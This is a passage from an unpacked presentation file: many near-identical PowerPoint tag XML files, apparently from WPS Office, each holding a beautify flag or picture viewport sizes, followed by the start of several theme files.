<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag90.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag900.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag901.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag902.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag903.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag904.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag905.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag906.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag907.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag908.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag909.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag91.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag910.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag911.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag912.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag913.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag914.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag915.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag916.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag917.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag918.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag919.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag92.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag920.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag921.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag922.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag923.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag924.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag925.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag926.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag927.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag928.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag929.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag93.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag930.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag931.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag932.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag933.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag934.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag935.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag936.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag937.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag938.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag939.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag94.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag940.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag941.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag942.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag943.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag944.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag945.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag946.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag947.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag948.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag949.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag95.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag950.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:3435,&quot;width&quot;:9075}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag951.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:7074,&quot;width&quot;:7027}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag952.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:930,&quot;width&quot;:4635}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag953.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag954.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag955.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag956.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag957.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag958.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag959.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag96.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag960.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag961.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag962.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag963.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag964.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag965.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag966.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag967.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag968.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag969.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag97.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag970.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag971.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag972.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag973.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag974.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag975.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag976.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag977.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag978.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag979.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag98.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag980.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag981.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag982.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag983.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag984.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag985.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag986.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag987.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag988.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag989.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag99.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag990.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag991.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag992.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag993.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag994.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag995.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag996.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag997.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag998.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag999.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="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10.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="9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100.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="99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101.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="100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102.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="101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103.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="102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104.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="103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105.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="104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106.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="105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107.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="106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108.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="107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109.xml><?xml version="1.0" encoding="utf-8"?>
